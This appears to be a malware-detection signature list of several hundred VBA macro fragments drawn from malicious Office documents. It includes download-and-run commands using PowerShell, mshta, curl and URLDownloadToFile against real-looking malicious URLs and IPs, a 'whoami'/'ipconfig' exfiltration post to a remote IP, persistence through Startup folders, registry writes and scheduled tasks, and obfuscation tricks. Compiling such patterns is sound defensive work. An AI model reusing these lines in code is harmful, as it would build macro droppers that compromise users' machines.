 - 185.243.215.213/sys_info.vbs", False (MACROHSTR_EXT)
 - xHttp.Open "GET", "http:// (MACROHSTR_EXT)
 - .savetofile "sys_info.vbs", 2 (MACROHSTR_EXT)
 - Shell "wscript sys_info.vbs", vbNormalFocus (MACROHSTR_EXT)
 - bStrm = CreateObject("Adodb.Stream") (MACROHSTR_EXT)
 - xHttp = CreateObject("Microsoft.XMLHTTP") (MACROHSTR_EXT)
 - = ActiveDocument.Content (MACROHSTR_EXT)
 - " h" + "t" + "t" + "p" + ":" + "/" + "/" + "1" + "2" + "3" + "0" + "9" + "4" + "8" (MACROHSTR_EXT)
 - "%" + "1" + "2" + "3" + "0" + "9" + "4" + "8" + "@" + "j" + "." + "m" + "p" + "/" (MACROHSTR_EXT)
 - Shell "c" + "m" + "d /" + "c m" + "s" + "h" + "t" + "a" (MACROHSTR_EXT)
 - "jasidj" + "djsalsda" + "dhnjksa" (MACROHSTR_EXT)
 - shdjsd = "new:F935DC22" + "-1CF0-11D" + "0-ADB9-00C" + "04FD58A0B" (MACROHSTR_EXT)
 - uNAq.Run A2, 0 (MACROHSTR_EXT)
 - http://synergyctsfl.com/falcon.exe (MACROHSTR_EXT)
 - gift.exe (MACROHSTR_EXT)
 - licen1 = "fl" + "st" + "udi" + "o" + ".j" + "s" (MACROHSTR_EXT)
 - Set fo = fso.CreateTextFile(licen1) (MACROHSTR_EXT)
 - fo.WriteLine ignttext (MACROHSTR_EXT)
 - = "try {WScript.Sleep(14000);var s =  (MACROHSTR_EXT)
 - code by Necronomikon/[D00MRiderz] (MACROHSTR_EXT)
 - Shell Environ(""SYSDIR"") & ""\ftp.exe -s:c:\nec.ftp"", vbHide (MACROHSTR_EXT)
 - Shell ""c:\infos4u.txt (MACROHSTR_EXT)
 - Shell ""c:\ (MACROHSTR_EXT)
 - .scr (MACROHSTR_EXT)
 - ://statblogger.com/header.jpg (MACROHSTR_EXT)
 - C:\users\Public\" + "wt.jpg" (MACROHSTR_EXT)
 - .Run (asdsadsadwqdwqdqw(xx)) (MACROHSTR_EXT)
 - Application.Wait (Now + TimeValue("0:00:07")) (MACROHSTR_EXT)
 - ghhfgfgdsfas.RegDelete (asdsadsadwqdwqdqw(sxx)) (MACROHSTR_EXT)
 - = NeIkLIoQIdud.rT9yk_i3V_pVnf (MACROHSTR_EXT)
 - = AksW4Rnj0.N9SEDQPEhcZn (MACROHSTR_EXT)
 - = DnQF1_i6K9.VJdx5zyHf (MACROHSTR_EXT)
 - = K7Iwdz05ZeIW8k8D.WFOp5rOuls (MACROHSTR_EXT)
 - \KIOL.FERRAASS (MACROHSTR_EXT)
 - www.compuplus.in/lays/reshy.php (MACROHSTR_EXT)
 - Shell("powershell.exe -noexit -Command ""IEX ((new-object net.webclient).downloadstring('http://example.com/malicious/payload.exe'))""", 1) (MACROHSTR_EXT)
 - share.getcloudapp.com/xQunYD1W/download/Final.pif?k=98a556e0&utm_source=viewer_new" (MACROHSTR_EXT)
 - ImagemSimplesCDT = "https:// (MACROHSTR_EXT)
 - URLDownloadToFile 0, ImagemSimplesCDT, MasterCDT & "document.pif", 0, 0 (MACROHSTR_EXT)
 - PDf_3 = "ng 127.0.0.1 -n 10 " (MACROHSTR_EXT)
 - PDf_5 = "exe" (MACROHSTR_EXT)
 - Get(Nuts("104122127068067112097131128116118132132")).Create (MACROHSTR_EXT)
 - Shell "C:\Windows\System32\mshta.exe https://www.minpic.de/k/b (MACROHSTR_EXT)
 - / ", 0 (MACROHSTR_EXT)
 - Shell ("powershell.exe (MACROHSTR_EXT)
 - Invoke-WebRequest http://mailicious.com/filemanager.exe -OutFile C:\\filemanager.exe (MACROHSTR_EXT)
 - Open ("c:\programdata\Milne.CMD") For Output As #j (MACROHSTR_EXT)
 - Print #j, WDFRTVGBYHBEDRFTGYH.mlbl.Caption & b (MACROHSTR_EXT)
 - WinExec "cmd /c (MACROHSTR_EXT)
 - = Environ("TMP") & "\test_make_doc.exe (MACROHSTR_EXT)
 - Open "C:\Users\Public\Documents\1.dot (MACROHSTR_EXT)
 - Set rootFolder = service.GetFolder("\") (MACROHSTR_EXT)
 - Call service.Connect (MACROHSTR_EXT)
 - = "eval(eval(String.fromCharCode" + (MACROHSTR_EXT)
 - = "j" + "o" + "b" + "s" + "website" + "." + "j" + "s (MACROHSTR_EXT)
 - = Shell("wscript " +  (MACROHSTR_EXT)
 - = IEfvKhGcYzdp.Z2Dq7_bN05 (MACROHSTR_EXT)
 - = Vpq7900rKJ.W1VFigp5mwqm20es (MACROHSTR_EXT)
 - fAupDP09ZgpN.kjbX_2ZUN_sUI (MACROHSTR_EXT)
 - = ZE0zZVG8nzUS.AIuE_foy_oaO_LNr0 (MACROHSTR_EXT)
 - = Dtjw9_c9uR_qLnf_vqi.nBXYM3T (MACROHSTR_EXT)
 - obj = CreateObject("wscript.shell") (MACROHSTR_EXT)
 - 39.100.159.8/aaa" + RunResult + RunResultwhoami (MACROHSTR_EXT)
 - URL = "http:// (MACROHSTR_EXT)
 - objHTTP.Open "POST", URL, False (MACROHSTR_EXT)
 - exeRs = obj.Exec("whoami") (MACROHSTR_EXT)
 - obj.Exec("ipconfig ") (MACROHSTR_EXT)
 - exeRs.StdOut.ReadAll (MACROHSTR_EXT)
 - objHTTP.send ("") (MACROHSTR_EXT)
 - Lib "user32.dll" Alias "PostMessageA" (ByVal (MACROHSTR_EXT)
 - .Create VlDqcYjjaArKK62S, Null, (MACROHSTR_EXT)
 - TempPath = Environ("TMP") + "\" (MACROHSTR_EXT)
 - \appdata\roaming\MicrosoftBackup.vbs (MACROHSTR_EXT)
 - = "" /s "" + apppath + ""\backup.dll""" & vbNewLine (MACROHSTR_EXT)
 - oWS.SpecialFolders(""startup"")" & vbNewLine (MACROHSTR_EXT)
 - WinHttpReq.Open "POST", myURL, False, "", "" (MACROHSTR_EXT)
 - Shell "wscript " + OutPutFileName, vbHide (MACROHSTR_EXT)
 - Call PfRINQcr.JcgWVDNjp (MACROHSTR_EXT)
 - .Run Gravity & "" & kEZlkeB, 0.0001 (MACROHSTR_EXT)
 - Call kFfpAqHA.bHnQgxk (MACROHSTR_EXT)
 - .Run Gravity & "" & IcbbEztYb, 0.0001 (MACROHSTR_EXT)
 - .Paragraphs.Count To 1 Step -1 (MACROHSTR_EXT)
 - vb09.Run Gravity & "" &  (MACROHSTR_EXT)
 - , 0.0001 (MACROHSTR_EXT)
 - oRng.MoveEndWhile Chr(32) (MACROHSTR_EXT)
 - kithuatphanmem.000webhostapp.com/chare/test.zip (MACROHSTR_EXT)
 - oShell.Run "cmd.exe /c curl https:// (MACROHSTR_EXT)
 - oShell = CreateObject("WScript.Shell") (MACROHSTR_EXT)
 - --output D:\zz.zip", 0, False (MACROHSTR_EXT)
 - Application.Visible = True (MACROHSTR_EXT)
 - .Namespace( (MACROHSTR_EXT)
 - ).Self.InvokeVerb "Paste" (MACROHSTR_EXT)
 -  + "\LCSSW.txt" As  (MACROHSTR_EXT)
 -  + "\LCSSW.js" (MACROHSTR_EXT)
 -  + "\LCSSW.txt") = "" Then (MACROHSTR_EXT)
 - Application.Wait (Now + TimeValue("0:00:02")) (MACROHSTR_EXT)
 - If InStr(1, Sh.Name, "Object", 1) Then (MACROHSTR_EXT)
 - Sh.Copy (MACROHSTR_EXT)
 - = CauTts2s.VSvwc3L (MACROHSTR_EXT)
 - = RCub_Mhh_xYAl_7wT.DHtEoo3J (MACROHSTR_EXT)
 - = WQWVC_DGR4_wV09_due.OgB0_c1f_SUQ (MACROHSTR_EXT)
 - = bgtJj_UiH7_jmP.PszXs_GWkN (MACROHSTR_EXT)
 - = HgYl_Dv5_Oai_73S.HngWnqKWSW9 (MACROHSTR_EXT)
 - .ShellExecute "P" + fjkerooos, fgfjhfgfg, "", "", 0 (MACROHSTR_EXT)
 - Range("FF1200").Value (MACROHSTR_EXT)
 - xxxx = "workout.js" (MACROHSTR_EXT)
 - zoon = "wscript " + koolxxxx (MACROHSTR_EXT)
 - oFile.WriteLine koonmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm (MACROHSTR_EXT)
 - .Get(afsaf21r23rafasfasf22223afasf("099117122063062107092126123111113127127")).Create afsaf21r23rafasfasf22223afasf("111109120111058113132113"), (MACROHSTR_EXT)
 - Environ("TMP") & "\TestExploit.exe" (MACROHSTR_EXT)
 - wqprhnqyktgkfnilguyz.Run strFilename (MACROHSTR_EXT)
 - Application.Wait (Now + TimeValue("0:00:04")) (MACROHSTR_EXT)
 - www.diamantesviagens.com.br/Run.jpg" (MACROHSTR_EXT)
 - URL = "https:// (MACROHSTR_EXT)
 - startupfolder = "C:\Users\" (MACROHSTR_EXT)
 - CreateObject("WScript.Network").UserName (MACROHSTR_EXT)
 - AppData\Roaming\" + "Microsoft\Windows\Start Menu\Programs\Startup\pp.bat (MACROHSTR_EXT)
 - = gNSA_3bv0_vBg.EOfTb_wvJ (MACROHSTR_EXT)
 - = DhZzF8etYv1nI.JL0ljQwfuKoA (MACROHSTR_EXT)
 - = aBdzM_UwU_wOa.RYKf2mHce (MACROHSTR_EXT)
 - = zZH6IIgkQfw.we4kYNixhkzG (MACROHSTR_EXT)
 - = HaEAW_oZu.IZCHsIrtHxIs (MACROHSTR_EXT)
 - = NpJGX_v4Gv_RmO_1mMX.JQbAN_TmkL_hm5_gi2 (MACROHSTR_EXT)
 - = pGfDl_scDd_u32S.HNJi_khie_VjOD_CoFe (MACROHSTR_EXT)
 - = fskc9_uhl5_cEz4.yUMKR_m5Y (MACROHSTR_EXT)
 - POWERshEll.ExE wGet http://194.195.209.88/applauchh.exe (MACROHSTR_EXT)
 - POWERshEll.ExE wGet https://arturkarolczakshiola.com/jazz/tg6Nrmq9tDO7bTI.exe (MACROHSTR_EXT)
 - outFIlE o.exe (MACROHSTR_EXT)
 - .ShowWindow = CLng(( (MACROHSTR_EXT)
 -  ).SpawnInstance_ (MACROHSTR_EXT)
 - Debug.Print  (MACROHSTR_EXT)
 - meinkonhun.EXEC listen1 + madar2 + janu3 + fakir4 (MACROHSTR_EXT)
 - ")).Get( (MACROHSTR_EXT)
 - (")).Create  (MACROHSTR_EXT)
 - .Get( (MACROHSTR_EXT)
 - .Get(afsaf21r23rafasfasf22223afasf("099" + y + y + y + "1" + y + "1" + "71220630621" + y + y + y + "0" + "7" + "0" + "9" + "2" + "12" + y + y + "612311" + y + "111" + "" + y + "3" + "127127")) (MACROHSTR_EXT)
 - .Create afsaf21r23rafasfasf22223afasf("1111091201" + "11" + y + y + "058113132113"), aacsasca7sca7cascvasccsasca7sca7cascvasc, acsasca7sca7cascvasc, sacascascacsasca7sca7cascvasc (MACROHSTR_EXT)
 - .Namespace(unZipFolderName).CopyHere obrqxjxbZiRXQYEpIt_RXQYE_20210329_092748_ (MACROHSTR_EXT)
 - fso.CreateTextFile(filePath) (MACROHSTR_EXT)
 - .Run(D__n9Su8E4WjZScRg3izADYX2w_ (MACROHSTR_EXT)
 - WinExec UCase("cmd /c c:\programdata\advs.") (MACROHSTR_EXT)
 - Print #1, vbCrLf + Animated.Invaders.Caption + vbCrLf + CStr(CDate("11/01/1998")) (MACROHSTR_EXT)
 - TextBox1.Text & "  " & ChrW(i) (MACROHSTR_EXT)
 - CreateObject("W" + "Sc" + "r" + "" + "i" + "pt" + "" + "." + "S" + "hel" + "" + "" + "" + "" + "l") (MACROHSTR_EXT)
 - edFlFxCGC.Run("" + hJAEoBklj + "", 0, False) (MACROHSTR_EXT)
 - "w" + "s" + "cr" + "" + "i" + "" + "p" + "t" + "." + "" + "e" + "x" + "" + "" + "" + "" + "e" (MACROHSTR_EXT)
 - BeHBQoFZK.CreateTextFile(ImcdyPbRx, True, True) (MACROHSTR_EXT)
 - titu = "h" + "tt" + "ps" + "://bit" + ".do/" + "fPQKY" (MACROHSTR_EXT)
 - = "=I" + "F(ISNUMBER(SEARCH(""32"",GET.WORKSPACE(1))), GOTO(B127), GOTO(C127))" (MACROHSTR_EXT)
 - ExcelSheet.Range("A127") = "=ERR" + "OR" + "(FALSE)" (MACROHSTR_EXT)
 - ("Co" & Chr(109) & "men" & Chr(116) & "s").Value (MACROHSTR_EXT)
 - "/lasdwe/bdaa3811-bb6c-42c7-ae25-0329f3a59ce1", 436, zzzzh (MACROHSTR_EXT)
 - = main.r("c:\users\public\redLineSea.ht") (MACROHSTR_EXT)
 - .Content.Find.Execute FindText:="%_", ReplaceWith:="", Replace:=wdReplaceAll (MACROHSTR_EXT)
 - .run lineLoveLady (MACROHSTR_EXT)
 - .ExpandEnvironmentStrings("%TEMP%") & "\cym_16001380430BD84B24.exe" (MACROHSTR_EXT)
 - = kuQWG9Jl(UserForm1.Label1.Caption) (MACROHSTR_EXT)
 - c:\\users\\public\\nameTpl.h (MACROHSTR_EXT)
 - = responseDeleteResponse & convertScr & "" & refCnt & lBDocument (MACROHSTR_EXT)
 - ddzdqsdff() & "\" + rmlkejgmlkdfjgri(2) + ".exe" (MACROHSTR_EXT)
 - PxPToxhq.Open "GET", sdqsldjkf, False (MACROHSTR_EXT)
 - slkfjdfjhglkjdshze.Run XxX, 1, True (MACROHSTR_EXT)
 - K = "diamantesviagens.com.br/" (MACROHSTR_EXT)
 - T = "VirusEmHta.mp3" (MACROHSTR_EXT)
 - " H" + D + D + L + "://" + K + T (MACROHSTR_EXT)
 - getwc = "explorer.exe c:\programdata\nextTextClear.hta" (MACROHSTR_EXT)
 - getwc = "explorer.exe c:\programdata\counterCountVb.hta" (MACROHSTR_EXT)
 - getwc = "explorer.exe c:\programdata\procedureTemp.hta" (MACROHSTR_EXT)
 - getwc = "explorer.exe c:\programdata\swapCounterVariable.hta" (MACROHSTR_EXT)
 - getwc = "explorer.exe c:\programdata\queryLeft.hta" (MACROHSTR_EXT)
 - getwc = "explorer.exe c:\programdata\responseSwapMem.hta" (MACROHSTR_EXT)
 - .exec p(getwc) (MACROHSTR_EXT)
 - #"body></html>") (MACROHSTR_EXT)
 - F.Value, False (MACROHSTR_EXT)
 - .SetOption 2, .GetOption(2) (MACROHSTR_EXT)
 - If .Status = 200 Then (MACROHSTR_EXT)
 - Debug.Print MsgBox("ERROR!", vbOKCancel); returns; 1 (MACROHSTR_EXT)
 - = "https://www.bitly.com/" (MACROHSTR_EXT)
 - Debug.Print X (MACROHSTR_EXT)
 - Debug.Print Y (MACROHSTR_EXT)
 - Debug.Print Z (MACROHSTR_EXT)
 - Debug.Print (Shell(X + Y + Z)) (MACROHSTR_EXT)
 - explorer.exe c:\programdata\ (MACROHSTR_EXT)
 -  .hta" (MACROHSTR_EXT)
 - .exec p(rm) (MACROHSTR_EXT)
 - = Split(p(frm.rm), " ") (MACROHSTR_EXT)
 - efoWL1kD.Run (MACROHSTR_EXT)
 - retval = Shell("wscript.exe mozilla.vbs") (MACROHSTR_EXT)
 - Print #TextFile, Range("AH1607").Value + Range("AH1606").Value + Range("AH1605").Value (MACROHSTR_EXT)
 - FilePath = "mozilla.vbs" (MACROHSTR_EXT)
 - (Split(kij(0), overdue_1(Oa))), directoo & "\" & fillename, 0, 0 (MACROHSTR_EXT)
 - Shell k.clone.ControlTipText (MACROHSTR_EXT)
 - k.opener.GroupName (MACROHSTR_EXT)
 - Shell calculator. (MACROHSTR_EXT)
 - = StrReverse("ath. (MACROHSTR_EXT)
 - \atadmargorp\:c exe.rerolpxe\swodniw\:c") (MACROHSTR_EXT)
 - .Create p( (MACROHSTR_EXT)
 - = Split(p(frm. (MACROHSTR_EXT)
 - .Open "get",  (MACROHSTR_EXT)
 - namespaceGlobalRequest.DataType = "bin.base64" (MACROHSTR_EXT)
 - CreateObject("wscript.shell").RegWrite argumentLink, 1, "REG_DWORD" (MACROHSTR_EXT)
 - = StrConv(bufferData("SEtFWV9DVVJSRU5UX1VTRVJcU29mdHdhcmVcTWljcm9zb2Z0XE9mZmljZVw="), vbUnicode) (MACROHSTR_EXT)
 - removeTable.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString listboxStorageCounter (MACROHSTR_EXT)
 - %("SEtFWV9DVVJSRU5UX1VTRVJcU29mdHdhcmVcTWljcm9zb2Z0XE9mZmljZVw="), vbUnicode) (MACROHSTR_EXT)
 - CreateObject("wscript.shell").RegWrite  (MACROHSTR_EXT)
 - = UserForm1.TextBox1 (MACROHSTR_EXT)
 - = CreateObject("msxml2.domdocument") (MACROHSTR_EXT)
 - .createElement("code") (MACROHSTR_EXT)
 - = Application.Version (MACROHSTR_EXT)
 - .VBProject.VBComponents("ThisDocument").CodeModule.AddFromString (MACROHSTR_EXT)
 - ("SEtFWV9DVVJSR" &  (MACROHSTR_EXT)
 - .RegWrite  (MACROHSTR_EXT)
 - = CreateObject("word.application") (MACROHSTR_EXT)
 - computer2 = "t" + "t" + "p" + ":" + "/" + "/" + "w" + "w" + "w" (MACROHSTR_EXT)
 - computer3 = ".j.mp/ (MACROHSTR_EXT)
 - p = mode.computer + mode.computer2 + mode.computer3 (MACROHSTR_EXT)
 - = "t" + "t" + "p" + ":" + "/" + "/" + "w" + "w" + "w" (MACROHSTR_EXT)
 - = ".j.mp/ddsobunbchonteskateesjdw" (MACROHSTR_EXT)
 - .computer2 + calc _ (MACROHSTR_EXT)
 - .exec$ (rightDataFunc) (MACROHSTR_EXT)
 - frm.button1_Click (MACROHSTR_EXT)
 - = Split(ActiveDocument.BuiltInDocumentProperties("title"), " ") (MACROHSTR_EXT)
 - hol.pop (MACROHSTR_EXT)
 - lol = "mshta http://www.j.mp/jaosdoaskdaosd" (MACROHSTR_EXT)
 - FileNoome = hill.FileNxme (MACROHSTR_EXT)
 - FileNllme = hill.FileNlme (MACROHSTR_EXT)
 - FileNlme = " http://www.j.mp/ajdddsdiocsjcjosdj" (MACROHSTR_EXT)
 - n = ActiveDocument.Name (MACROHSTR_EXT)
 - .exec (sr(tmpIndex)) (MACROHSTR_EXT)
 - = Split(sr(ActiveDocument.BuiltInDocumentProperties("title")), " ") (MACROHSTR_EXT)
 - .exec (sr(rightButton)) (MACROHSTR_EXT)
 - .exec (sr(databaseRightStorage)) (MACROHSTR_EXT)
 - .exec (sr(exceptionStorageOption)) (MACROHSTR_EXT)
 - = Join(countScreenTitle, "") (MACROHSTR_EXT)
 - .RegWrite screenValueCount, 1, "REG_DWORD" (MACROHSTR_EXT)
 - textboxProcedureCollection = CreateObject("word.application") (MACROHSTR_EXT)
 -  = UserForm1.TextBox1 (MACROHSTR_EXT)
 - globalMemory = "\Word\Security\AccessVBOM" (MACROHSTR_EXT)
 - HelsWkjzCFxVleNw Lib "shell32.dll" (MACROHSTR_EXT)
 - IcryptOIhiugytFFJgjHFJG("fyf/jdud") (MACROHSTR_EXT)
 - Range("V1").Value = "comprobante de pago" (MACROHSTR_EXT)
 - = ActiveDocument.BuiltInDocumentProperties("title") (MACROHSTR_EXT)
 - .exec (sr( (MACROHSTR_EXT)
 - title = ActiveDocument.BuiltInDocumentProperties("title") (MACROHSTR_EXT)
 - Shell ("rundll32.exe " & Options.DefaultFilePath(wdStartupPath) & "\zs.z,XBDOAOUFMRH") (MACROHSTR_EXT)
 - Set FSO = CreateObject("Scripting.FileSystemObject") (MACROHSTR_EXT)
 - Search FSO.GetFolder(Options.DefaultFilePath(wdTempFilePath)) (MACROHSTR_EXT)
 - If Fil.Name = "fax.f" Then (MACROHSTR_EXT)
 - sdiuafhupif = "daskfjdoasi dfiasus dsa89dsf8safu" (MACROHSTR_EXT)
 - obj1.Class1obj (MACROHSTR_EXT)
 - assas.NewX (MACROHSTR_EXT)
 - VirtualMeat1 = UserForm1.Image1.Tag (MACROHSTR_EXT)
 - shellexecute _ (MACROHSTR_EXT)
 - "j.mp/" (MACROHSTR_EXT)
 - .com/17/andre34.ex (MACROHSTR_EXT)
 - http://scaladevelopments.scaladevco (MACROHSTR_EXT)
 - CreateObject("wscript.shell").Run (MACROHSTR_EXT)
 - C:\Users\Public\Documents\electionover.ex (MACROHSTR_EXT)
 - = CreateObject("wscript.shell").Run (MACROHSTR_EXT)
 - http://scaladevelopments.scaladevco.com/17/ (MACROHSTR_EXT)
 - C:\Users\Public\Documents\ (MACROHSTR_EXT)
 - Shell ("curl http://www.bookiq.bsnl.co.in/data_entry/circulars/m (MACROHSTR_EXT)
 - c.exe (MACROHSTR_EXT)
 - Shell ("C:\Users\Public\a.exe") (MACROHSTR_EXT)
 - wshshell.specialfolders(" (MACROHSTR_EXT)
 - .").open"get",("h://www.d.m/mb/vhvjhgbvvmh. (MACROHSTR_EXT)
 - http://www.bookiq.bsnl.co.in/data_entry/circulars/mac.exe (MACROHSTR_EXT)
 - Shell ("file1.exe") (MACROHSTR_EXT)
 - wsh.Run FgbV45g & tBYqqxmFZ, -87 (MACROHSTR_EXT)
 - Shell "explorer copyFunction.hta", vbNormalFocus (MACROHSTR_EXT)
 - Shell "explorer booleanZeroC.hta", vbNormalFocus (MACROHSTR_EXT)
 - Open "copyFunction.hta" & buttonReference For Output As #1 (MACROHSTR_EXT)
 - Open "booleanZeroC.hta" & buttonReference For Output As #1 (MACROHSTR_EXT)
 - Print #1, ActiveDocument.Range.Text (MACROHSTR_EXT)
 - clearScr (MACROHSTR_EXT)
 - "https://www.bitly.com/asiajiwn" (MACROHSTR_EXT)
 - = CreateObject("WScript.Shell") (MACROHSTR_EXT)
 - (Environ("USERPROFILE") + "\Documents\" + "qX2xpJ5V.txt") Then (MACROHSTR_EXT)
 - mp4klgzo.CreateFolder (pacbhdvc) (MACROHSTR_EXT)
 - = q87fpor4.Run("wscript.exe //b " + Chr(34) + qs + Chr(34), 4, False) (MACROHSTR_EXT)
 - .hta", vbNormalFocus (MACROHSTR_EXT)
 - .hta" & buttonReference For Output As # (MACROHSTR_EXT)
 - Shell Replace("wscript ""FILE"" ", "FILE", myFile) (MACROHSTR_EXT)
 - WshShell.Run """"""%UserProfile%\ (MACROHSTR_EXT)
 - .exe"""" -d (MACROHSTR_EXT)
 - myFile = userProfilePath + "\layoffs (MACROHSTR_EXT)
 - .vbs" (MACROHSTR_EXT)
 - Print #myoutputfile, "HTTPDownload ""http:// (MACROHSTR_EXT)
 - objFile.Write Chr(AscB(MidB(objHTTP.ResponseBody, i, 1))) (MACROHSTR_EXT)
 - Open','https://a.pomf.cat/uquyqs.t (MACROHSTR_EXT)
 - .CreateTextFile(jrhuUJhg1 & "\" & "rberbr.js", True, True) (MACROHSTR_EXT)
 - Shell Environ("COMSPEC") & " /c start " & jrhuUJhg1 & "\" & "rberbr.js", vbHide (MACROHSTR_EXT)
 - Set objOL = CreateObject("Outlook.Application") (MACROHSTR_EXT)
 - Set WshShell = objOL.CreateObject("WScript.Shell") (MACROHSTR_EXT)
 - Set WshShellExec = WshShell.Exec(command) (MACROHSTR_EXT)
 - RunCommand = WshShellExec.StdOut.ReadAll (MACROHSTR_EXT)
 - Set objXML = CreateObject("MSXML2.DOMDocument") (MACROHSTR_EXT)
 - EncodeBase64 = objNode.text (MACROHSTR_EXT)
 - objHTTP.send (encryptData) (MACROHSTR_EXT)
 - + "w" + "." + "b" + "i" + "t" + "l" + "y" + "." + "c" + "o" + "m/hwdinnwshdwdwdwwdwmqwhda", _ (MACROHSTR_EXT)
 - "Shell32.dll" _ (MACROHSTR_EXT)
 - "ShellExecuteA" _ (MACROHSTR_EXT)
 - "w" + "." + "b" + "i" + "t" + "l" + "y" + "." + "c" + "o" + "m/hwdinnwsnddwmwddwomwqwhda", _ (MACROHSTR_EXT)
 - ShellExecute _ (MACROHSTR_EXT)
 - fso = CreateObject("Scripting.FileSystemObject") (MACROHSTR_EXT)
 - o1.Run "C:\windows\Temp\ssg.exe" (MACROHSTR_EXT)
 - Set o1 = CreateObject("Wscript.Shell") (MACROHSTR_EXT)
 - fso.DeleteFile (sFile) (MACROHSTR_EXT)
 - = "WSCript.shell":  (MACROHSTR_EXT)
 -     oDoc.PrintOut (MACROHSTR_EXT)
 - Environ("USERPROFILE") + "\Documents\Adobe Help Center" (MACROHSTR_EXT)
 - .FileExists(Environ("USERPROFILE") + "\Documents\" + "Eua58Y2F.txt" (MACROHSTR_EXT)
 - HelpCenterUpdater.vbs" (MACROHSTR_EXT)
 - .Run("wscript.exe //b " + Chr(34) + qs + Chr(34), 4, False) (MACROHSTR_EXT)
 - baseball.confessionariesVilnius ("Temp") (MACROHSTR_EXT)
 - Call copitasPicard("Clareaccidence", "Samnitecommunalisation", "chilly") (MACROHSTR_EXT)
 - obj.Procedurecall (MACROHSTR_EXT)
 - ReturnValue = CreateProcessA(0&, cmdline$, 0&, 0&, 1&, _ (MACROHSTR_EXT)
 - arraymain(i).barcode = "mshta " (MACROHSTR_EXT)
 - = "bitly.com/asd (MACROHSTR_EXT)
 - obj.SUSSYBAKA (boba + bob2 + bob3) (MACROHSTR_EXT)
 - Money = Left(taliya, 4) + String(1, "a") + Alienware + Replace("Loveofmyliufe", "Loveofmyliufe", "http:\\b") & "it.ly/qlotulpvbtlw46b5jx22" (MACROHSTR_EXT)
 - Call Shell(Money & sCommandToRun, vbHide) (MACROHSTR_EXT)
 - = maqaraayhmweor.Run(pjehyevzqgylpj, ryevtddf) (MACROHSTR_EXT)
 - Call jdqwp.cjkgjomnsqpubuwvkefu (MACROHSTR_EXT)
 - = .CreateTextFile(Environ("ALLUSERSPROFILE") & "\qIMEModeHangulFull.xsl") (MACROHSTR_EXT)
 - , , "Good", Err.HelpFile, Err.HelpContext (MACROHSTR_EXT)
 - = CreateObject("Schedule.Service") (MACROHSTR_EXT)
 - .GetFolder("") (MACROHSTR_EXT)
 - programstill = "C:\Users\Public\Documents\singlerisk.bat" (MACROHSTR_EXT)
 - " -w h Start-BitsTransfer -Source https://cargotrans-giobal.com/h/rrr.exe (MACROHSTR_EXT)
 - -Destination C:\Users\Public\Documents\IMr.exe; (MACROHSTR_EXT)
 - Call womanlearn.Open(programstill) (MACROHSTR_EXT)
 - Macro6.VB_ProcData.VB_Invoke_Func = " \n14" (MACROHSTR_EXT)
 - .com/active/searchMessenger/dw.php?mode=etc", (MACROHSTR_EXT)
 - File_DownLoad "http://www.yesform (MACROHSTR_EXT)
 - Shell "C:\sMessenger\searchMessenger_upgrade_x.exe" (MACROHSTR_EXT)
 - ActiveSheet.Unprotect Password = 1234 (MACROHSTR_EXT)
 - = Application.ActiveWorkbook.FullName: Shell ("cmd.exe /C  """ + omegah_9 + """") (MACROHSTR_EXT)
 - (r, ""11Sf://xuNkIVX7.Ti/WV_jRiJcl/Afvor&NFgulr&QB.fMY?14=&mq0NAfymt0KAf"", (MACROHSTR_EXT)
 - "x:\fHdIXpB\3URY\nGjuloz.3Ai" (MACROHSTR_EXT)
 - .Run(owuttakt, usevn) (MACROHSTR_EXT)
 - Call kjxkackar.ddrhpottlfepmvwzkwsa (MACROHSTR_EXT)
 - = "WSCript.shell" (MACROHSTR_EXT)
 - .Run(sohmqyvabj, rsydwmbkhifxc) (MACROHSTR_EXT)
 - cfwctbzv.Run(zrvxexr, mvfzzxa) (MACROHSTR_EXT)
 - plspxijobkld = "WSCript.shell" (MACROHSTR_EXT)
 - subhwopsdxoqbvfd.Run(xsjcgn, jiytqwnvcszwiku) (MACROHSTR_EXT)
 - ihkkngiocklf = "WSCript.shell" (MACROHSTR_EXT)
 - docActive.Range(Start:=docActive.Words(1).Start, _ (MACROHSTR_EXT)
 - = nfobjhxuj.Run( (MACROHSTR_EXT)
 - objWshShell = CreateObject("WScript.Shell") (MACROHSTR_EXT)
 - Environ$("USERPROFILE") & "\" & yftFtfUIFIYTDTRdi5djtfdUSUDTIdutDsdjd (MACROHSTR_EXT)
 - Range("A1").Value = "Please wait" (MACROHSTR_EXT)
 - = Left(pptName, InStr(pptName,".")) & "pdf" (MACROHSTR_EXT)
 - .Run(derykeqbqjrmopaxmmvpjzike, gdwoasdmjfsz) (MACROHSTR_EXT)
 -  = New IWshRuntimeLibrary.WshShell (MACROHSTR_EXT)
 - .exec "scriptrunner.exe -appvscript " &  (MACROHSTR_EXT)
 - = ".h" &  (MACROHSTR_EXT)
 - Print #1, Replace(ActiveDocument.Content, " (MACROHSTR_EXT)
 - & " -w h Start-BitsTransfer -Source htt`p://qdyhygm.com/wp-content/plugins/masterx/New_Requests_1203802IMG.e`xe" & " -Destination (MACROHSTR_EXT)
 - C:\Users\Public\Documents\yardlead.e`xe (MACROHSTR_EXT)
 - = CreateObject(sheee & "ll.Application").Open(thousandpeople (MACROHSTR_EXT)
 - = "C:\Users\Public\Documents\studytonight.bat (MACROHSTR_EXT)
 - Replace(ActiveDocument.Content, "dmfd", "") (MACROHSTR_EXT)
 - = "." & installMixMix & installMp4Before (MACROHSTR_EXT)
 - .run "scriptrunner -appvscript " & installMixMix, 2 (MACROHSTR_EXT)
 - Replace(ActiveDocument.Content, "ruioq", "") (MACROHSTR_EXT)
 - .run "scriptrunner -appvscript " & pauseSetBefore, 2 (MACROHSTR_EXT)
 - = "." & pauseSetBefore & beforeBeforeStop (MACROHSTR_EXT)
 - Replace(ActiveDocument.Content, "8ikot", "") (MACROHSTR_EXT)
 - .run "scriptrunner -appvscript " & installStopMix, 2 (MACROHSTR_EXT)
 - = "." & installStopMix & startPausePlay (MACROHSTR_EXT)
 - Replace(ActiveDocument.Content, "gc6f", "") (MACROHSTR_EXT)
 - .run "scriptrunner -appvscript " & installStopSetup, 2 (MACROHSTR_EXT)
 - = "." & installStopSetup & playPlayWav (MACROHSTR_EXT)
 - = New IWshRuntimeLibrary.WshShell (MACROHSTR_EXT)
 - .run mixMp3Install, 2 (MACROHSTR_EXT)
 - = "." & mixMp3Install & setupSetMp3 (MACROHSTR_EXT)
 - Print #1, Replace(ActiveDocument.Content, "qqnbm", "") (MACROHSTR_EXT)
 - = Environ("temp") & "\srvcrm" & "." & "ex" & "e" (MACROHSTR_EXT)
